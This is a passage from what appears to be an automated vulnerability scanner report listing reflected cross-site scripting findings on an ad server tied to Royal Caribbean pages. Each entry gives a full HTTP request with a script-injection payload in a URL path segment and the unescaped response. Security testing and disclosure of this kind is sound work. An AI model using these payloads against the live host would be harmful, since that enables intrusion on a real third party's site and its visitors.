GET /2/RoyalCaribbean/ZAPa71c4"><script>alert(1)</script>279fadd2c16/1154839602@x96?_RM_HTML_title_=Hot%20Deals%20-%20Royal%20Caribbean%20International&_RM_HTML_url_=http%3A//www.royalcaribbean.com/dealsandmore/hotdeals.do%3FcS%3DNAVBAR%26pnav%3D3%26snav%3D1&_RM_HTML_referrer_=http%3A//www.royalcaribbean.com/search/processSearch.do%3Fip_server%3Dprdiphrase-unstruct-new222.dmz.rccl.com%253A200%26ip_text%3Dxss HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.royalcaribbean.com/dealsandmore/hotdeals.do?cS=NAVBAR&pnav=3&snav=1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ATT=TribalFusionB3; VolkswagenBTConq=UndertoneB3; NSC_o4efm_qppm_iuuq=ffffffff09419e3f45525d5f4f58455e445a4a423660; optouts=cookies; RMOPTOUT=3

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 12:45:30 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 338
Content-Type: text/html

<A HREF="http://b3.mookie1.com/RealMedia/ads/click_lx.ads/RoyalCaribbean/ZAPa71c4"><script>alert(1)</script>279fadd2c16/1662320424/x96/default/empty.gif/4d686437616b364a7258674142333038?x" target="_top">
...[SNIP]...

4.13. http://b3.mookie1.com/2/RoyalCaribbean/ZAP/1154839602@x96 [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/RoyalCaribbean/ZAP/1154839602@x96

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 779c2"><script>alert(1)</script>a0b177d5555 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/RoyalCaribbean/ZAP/1154839602@x96779c2"><script>alert(1)</script>a0b177d5555?_RM_HTML_title_=Hot%20Deals%20-%20Royal%20Caribbean%20International&_RM_HTML_url_=http%3A//www.royalcaribbean.com/dealsandmore/hotdeals.do%3FcS%3DNAVBAR%26pnav%3D3%26snav%3D1&_RM_HTML_referrer_=http%3A//www.royalcaribbean.com/search/processSearch.do%3Fip_server%3Dprdiphrase-unstruct-new222.dmz.rccl.com%253A200%26ip_text%3Dxss HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.royalcaribbean.com/dealsandmore/hotdeals.do?cS=NAVBAR&pnav=3&snav=1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ATT=TribalFusionB3; VolkswagenBTConq=UndertoneB3; NSC_o4efm_qppm_iuuq=ffffffff09419e3f45525d5f4f58455e445a4a423660; optouts=cookies; RMOPTOUT=3

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 12:45:33 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 330
Content-Type: text/html

<A HREF="http://b3.mookie1.com/RealMedia/ads/click_lx.ads/RoyalCaribbean/ZAP/1964537063/x96779c2"><script>alert(1)</script>a0b177d5555/default/empty.gif/4d686437616b364a7258674142333038?x" target="_top">
...[SNIP]...

4.14. http://b3.mookie1.com/2/RoyalCaribbean/ZAP/1413416439@x96 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/RoyalCaribbean/ZAP/1413416439@x96

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 41b45"><script>alert(1)</script>7d549cc21e was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/RoyalCaribbean41b45"><script>alert(1)</script>7d549cc21e/ZAP/1413416439@x96?_RM_HTML_title_=Royal%20Caribbean%20International&_RM_HTML_url_=http%3A//www.royalcaribbean.com/search/processSearch.do%3Fip_server%3Dprdiphrase-unstruct-new222.dmz.rccl.com%253A200%26ip_text%3Dxss&_RM_HTML_referrer_=http%3A//www.royalcaribbean.com/beforeyouboard/home.do%3FcS%3DNAVBAR HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.royalcaribbean.com/search/processSearch.do?ip_server=prdiphrase-unstruct-new222.dmz.rccl.com%3A200&ip_text=xss
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ATT=TribalFusionB3; VolkswagenBTConq=UndertoneB3; NSC_o4efm_qppm_iuuq=ffffffff09419e3f45525d5f4f58455e445a4a423660; optouts=cookies; RMOPTOUT=3

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 12:45:19 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 337
Content-Type: text/html

<A HREF="http://b3.mookie1.com/RealMedia/ads/click_lx.ads/RoyalCaribbean41b45"><script>alert(1)</script>7d549cc21e/ZAP/1697048049/x96/default/empty.gif/4d686437616b364a7258674142333038?x" target="_top">
...[SNIP]...

4.15. http://b3.mookie1.com/2/RoyalCaribbean/ZAP/1413416439@x96 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/RoyalCaribbean/ZAP/1413416439@x96

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d7596"><script>alert(1)</script>b218863f234 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/RoyalCaribbean/ZAPd7596"><script>alert(1)</script>b218863f234/1413416439@x96?_RM_HTML_title_=Royal%20Caribbean%20International&_RM_HTML_url_=http%3A//www.royalcaribbean.com/search/processSearch.do%3Fip_server%3Dprdiphrase-unstruct-new222.dmz.rccl.com%253A200%26ip_text%3Dxss&_RM_HTML_referrer_=http%3A//www.royalcaribbean.com/beforeyouboard/home.do%3FcS%3DNAVBAR HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.royalcaribbean.com/search/processSearch.do?ip_server=prdiphrase-unstruct-new222.dmz.rccl.com%3A200&ip_text=xss
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ATT=TribalFusionB3; VolkswagenBTConq=UndertoneB3; NSC_o4efm_qppm_iuuq=ffffffff09419e3f45525d5f4f58455e445a4a423660; optouts=cookies; RMOPTOUT=3

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 12:45:22 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 337
Content-Type: text/html

<A HREF="http://b3.mookie1.com/RealMedia/ads/click_lx.ads/RoyalCaribbean/ZAPd7596"><script>alert(1)</script>b218863f234/545133370/x96/default/empty.gif/4d686437616b364a7258674142333038?x" target="_top">
...[SNIP]...

4.16. http://b3.mookie1.com/2/RoyalCaribbean/ZAP/1413416439@x96 [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/RoyalCaribbean/ZAP/1413416439@x96

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b7850"><script>alert(1)</script>83c65d7cbe1 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/RoyalCaribbean/ZAP/1413416439@x96b7850"><script>alert(1)</script>83c65d7cbe1?_RM_HTML_title_=Royal%20Caribbean%20International&_RM_HTML_url_=http%3A//www.royalcaribbean.com/search/processSearch.do%3Fip_server%3Dprdiphrase-unstruct-new222.dmz.rccl.com%253A200%26ip_text%3Dxss&_RM_HTML_referrer_=http%3A//www.royalcaribbean.com/beforeyouboard/home.do%3FcS%3DNAVBAR HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.royalcaribbean.com/search/processSearch.do?ip_server=prdiphrase-unstruct-new222.dmz.rccl.com%3A200&ip_text=xss
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ATT=TribalFusionB3; VolkswagenBTConq=UndertoneB3; NSC_o4efm_qppm_iuuq=ffffffff09419e3f45525d5f4f58455e445a4a423660; optouts=cookies; RMOPTOUT=3

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 12:45:24 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 329
Content-Type: text/html

<A HREF="http://b3.mookie1.com/RealMedia/ads/click_lx.ads/RoyalCaribbean/ZAP/589395884/x96b7850"><script>alert(1)</script>83c65d7cbe1/default/empty.gif/4d686437616b364a7258674142333038?x" target="_top">
...[SNIP]...

4.17. http://b3.mookie1.com/2/RoyalCaribbean/ZAP/1795641562@x96 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/RoyalCaribbean/ZAP/1795641562@x96

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9c8ca"><script>alert(1)</script>c716c28ff0 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/RoyalCaribbean9c8ca"><script>alert(1)</script>c716c28ff0/ZAP/1795641562@x96?_RM_HTML_title_=Prepare%20For%20Your%20Cruise%20Before%20You%20Board%20-%20Royal%20Caribbean%20International&_RM_HTML_url_=http%3A//www.royalcaribbean.com/beforeyouboard/home.do%3FcS%3DNAVBAR&_RM_HTML_referrer_=http%3A//www.royalcaribbean.com/home.do HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.royalcaribbean.com/beforeyouboard/home.do?cS=NAVBAR
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ATT=TribalFusionB3; VolkswagenBTConq=UndertoneB3; optouts=cookies; RMOPTOUT=3; NSC_o4efm_qppm_iuuq=ffffffff09419e3f45525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 12:42:36 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 336
Content-Type: text/html

<A HREF="http://b3.mookie1.com/RealMedia/ads/click_lx.ads/RoyalCaribbean9c8ca"><script>alert(1)</script>c716c28ff0/ZAP/251078192/x96/default/empty.gif/4d686437616b364a7258674142333038?x" target="_top">
...[SNIP]...

4.18. http://b3.mookie1.com/2/RoyalCaribbean/ZAP/1795641562@x96 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/RoyalCaribbean/ZAP/1795641562@x96

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 743eb"><script>alert(1)</script>f2ee82d4d7a was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/RoyalCaribbean/ZAP743eb"><script>alert(1)</script>f2ee82d4d7a/1795641562@x96?_RM_HTML_title_=Prepare%20For%20Your%20Cruise%20Before%20You%20Board%20-%20Royal%20Caribbean%20International&_RM_HTML_url_=http%3A//www.royalcaribbean.com/beforeyouboard/home.do%3FcS%3DNAVBAR&_RM_HTML_referrer_=http%3A//www.royalcaribbean.com/home.do HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.royalcaribbean.com/beforeyouboard/home.do?cS=NAVBAR
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ATT=TribalFusionB3; VolkswagenBTConq=UndertoneB3; optouts=cookies; RMOPTOUT=3; NSC_o4efm_qppm_iuuq=ffffffff09419e3f45525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 12:42:39 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 337
Content-Type: text/html

<A HREF="http://b3.mookie1.com/RealMedia/ads/click_lx.ads/RoyalCaribbean/ZAP743eb"><script>alert(1)</script>f2ee82d4d7a/851647094/x96/default/empty.gif/4d686437616b364a7258674142333038?x" target="_top">
...[SNIP]...

4.19. http://b3.mookie1.com/2/RoyalCaribbean/ZAP/1795641562@x96 [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/RoyalCaribbean/ZAP/1795641562@x96

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 62c2c"><script>alert(1)</script>c817a57fe9f was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/RoyalCaribbean/ZAP/1795641562@x9662c2c"><script>alert(1)</script>c817a57fe9f?_RM_HTML_title_=Prepare%20For%20Your%20Cruise%20Before%20You%20Board%20-%20Royal%20Caribbean%20International&_RM_HTML_url_=http%3A//www.royalcaribbean.com/beforeyouboard/home.do%3FcS%3DNAVBAR&_RM_HTML_referrer_=http%3A//www.royalcaribbean.com/home.do HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.royalcaribbean.com/beforeyouboard/home.do?cS=NAVBAR
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ATT=TribalFusionB3; VolkswagenBTConq=UndertoneB3; optouts=cookies; RMOPTOUT=3; NSC_o4efm_qppm_iuuq=ffffffff09419e3f45525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 12:42:41 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 330
Content-Type: text/html

<A HREF="http://b3.mookie1.com/RealMedia/ads/click_lx.ads/RoyalCaribbean/ZAP/1219598856/x9662c2c"><script>alert(1)</script>c817a57fe9f/default/empty.gif/4d686437616b364a7258674142333038?x" target="_top">
...[SNIP]...

4.20. http://b3.mookie1.com/2/TRACK_Royalcaribbean/RC_Retargeting2_SX_Nonsecure@Bottom3 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/TRACK_Royalcaribbean/RC_Retargeting2_SX_Nonsecure@Bottom3

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4bad9"><script>alert(1)</script>26608d2f524 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/TRACK_Royalcaribbean4bad9"><script>alert(1)</script>26608d2f524/RC_Retargeting2_SX_Nonsecure@Bottom3 HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://fls.doubleclick.net/activityi;src=1740393;type=royal441;cat=rccom004;ord=5875754996668.548?
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ATT=TribalFusionB3; VolkswagenBTConq=UndertoneB3; optouts=cookies; RMOPTOUT=3

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 12:42:01 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 372
Content-Type: text/html

<A HREF="http://b3.mookie1.com/RealMedia/ads/click_lx.ads/TRACK_Royalcaribbean4bad9"><script>alert(1)</script>26608d2f524/RC_Retargeting2_SX_Nonsecure/538165577/Bottom3/default/empty.gif/4d686437616b364a7258674142333038?x" target="_top">
...[SNIP]...

4.21. http://b3.mookie1.com/2/TRACK_Royalcaribbean/RC_Retargeting2_SX_Nonsecure@Bottom3 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/TRACK_Royalcaribbean/RC_Retargeting2_SX_Nonsecure@Bottom3

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 436a1"><script>alert(1)</script>e78db836305 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/TRACK_Royalcaribbean/RC_Retargeting2_SX_Nonsecure@Bottom3436a1"><script>alert(1)</script>e78db836305 HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://fls.doubleclick.net/activityi;src=1740393;type=royal441;cat=rccom004;ord=5875754996668.548?
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ATT=TribalFusionB3; VolkswagenBTConq=UndertoneB3; optouts=cookies; RMOPTOUT=3

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 12:42:07 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 365
Content-Type: text/html

<A HREF="http://b3.mookie1.com/RealMedia/ads/click_lx.ads/TRACK_Royalcaribbean/RC_Retargeting2_SX_Nonsecure/1780256053/Bottom3436a1"><script>alert(1)</script>e78db836305/default/empty.gif/4d686437616b364a7258674142333038?x" target="_top">
...[SNIP]...

4.22. http://b3.mookie1.com/2/TRACK_Royalcaribbean/SiteOpt_CONV_SX_Secure@Bottom3 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/TRACK_Royalcaribbean/SiteOpt_CONV_SX_Secure@Bottom3

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bdd48"><script>alert(1)</script>146028e605b was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/TRACK_Royalcaribbeanbdd48"><script>alert(1)</script>146028e605b/SiteOpt_CONV_SX_Secure@Bottom3 HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.royalcaribbean.com/home.do
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ATT=TribalFusionB3; VolkswagenBTConq=UndertoneB3; optouts=cookies; RMOPTOUT=3; NSC_o4efm_qppm_iuuq=ffffffff09419e9045525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 12:42:09 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 366
Content-Type: text/html

<A HREF="http://b3.mookie1.com/RealMedia/ads/click_lx.ads/TRACK_Royalcaribbeanbdd48"><script>alert(1)</script>146028e605b/SiteOpt_CONV_SX_Secure/202946410/Bottom3/default/empty.gif/4d686437616b364a7258674142333038?x" target="_top">
...[SNIP]...

4.23. http://b3.mookie1.com/2/TRACK_Royalcaribbean/SiteOpt_CONV_SX_Secure@Bottom3 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/TRACK_Royalcaribbean/SiteOpt_CONV_SX_Secure@Bottom3

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 52c9c"><script>alert(1)</script>b5422f86a26 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/TRACK_Royalcaribbean/SiteOpt_CONV_SX_Secure@Bottom352c9c"><script>alert(1)</script>b5422f86a26 HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.royalcaribbean.com/home.do
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ATT=TribalFusionB3; VolkswagenBTConq=UndertoneB3; optouts=cookies; RMOPTOUT=3; NSC_o4efm_qppm_iuuq=ffffffff09419e9045525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 12:42:15 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 359
Content-Type: text/html

<A HREF="http://b3.mookie1.com/RealMedia/ads/click_lx.ads/TRACK_Royalcaribbean/SiteOpt_CONV_SX_Secure/1826300607/Bottom352c9c"><script>alert(1)</script>b5422f86a26/default/empty.gif/4d686437616b364a7258674142333038?x" target="_top">
...[SNIP]...

4.24. http://b3.mookie1.com/2/royalcaribbean.com/beforeyouboard/home.do/2932448897@x95 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/royalcaribbean.com/beforeyouboard/home.do/2932448897@x95

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4348e"><script>alert(1)</script>84fc31623a1 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/royalcaribbean.com4348e"><script>alert(1)</script>84fc31623a1/beforeyouboard/home.do/2932448897@x95?cS=NAVBAR&_RM_HTML_migValue_=&_RM_HTML_migTrans_= HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.royalcaribbean.com/beforeyouboard/home.do?cS=NAVBAR
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ATT=TribalFusionB3; VolkswagenBTConq=UndertoneB3; optouts=cookies; RMOPTOUT=3; NSC_o4efm_qppm_iuuq=ffffffff09419e3f45525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 12:42:38 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 361
Content-Type: text/html

<A HREF="http://b3.mookie1.com/RealMedia/ads/click_lx.ads/royalcaribbean.com4348e"><script>alert(1)</script>84fc31623a1/beforeyouboard/home.do/1876442626/x95/default/empty.gif/4d686437616b364a7258674142333038?x" target="_top">
...[SNIP]...

4.25. http://b3.mookie1.com/2/royalcaribbean.com/beforeyouboard/home.do/2932448897@x95 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/royalcaribbean.com/beforeyouboard/home.do/2932448897@x95

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 376fb"><script>alert(1)</script>65a17907e3f was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/royalcaribbean.com/beforeyouboard376fb"><script>alert(1)</script>65a17907e3f/home.do/2932448897@x95?cS=NAVBAR&_RM_HTML_migValue_=&_RM_HTML_migTrans_= HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.royalcaribbean.com/beforeyouboard/home.do?cS=NAVBAR
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ATT=TribalFusionB3; VolkswagenBTConq=UndertoneB3; optouts=cookies; RMOPTOUT=3; NSC_o4efm_qppm_iuuq=ffffffff09419e3f45525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 12:42:40 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 361
Content-Type: text/html

<A HREF="http://b3.mookie1.com/RealMedia/ads/click_lx.ads/royalcaribbean.com/beforeyouboard376fb"><script>alert(1)</script>65a17907e3f/home.do/1854471174/x95/default/empty.gif/4d686437616b364a7258674142333038?x" target="_top">
...[SNIP]...

4.26. http://b3.mookie1.com/2/royalcaribbean.com/beforeyouboard/home.do/2932448897@x95 [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/royalcaribbean.com/beforeyouboard/home.do/2932448897@x95

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 71986"><script>alert(1)</script>39fbfdcbd35 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/royalcaribbean.com/beforeyouboard/home.do71986"><script>alert(1)</script>39fbfdcbd35/2932448897@x95?cS=NAVBAR&_RM_HTML_migValue_=&_RM_HTML_migTrans_= HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
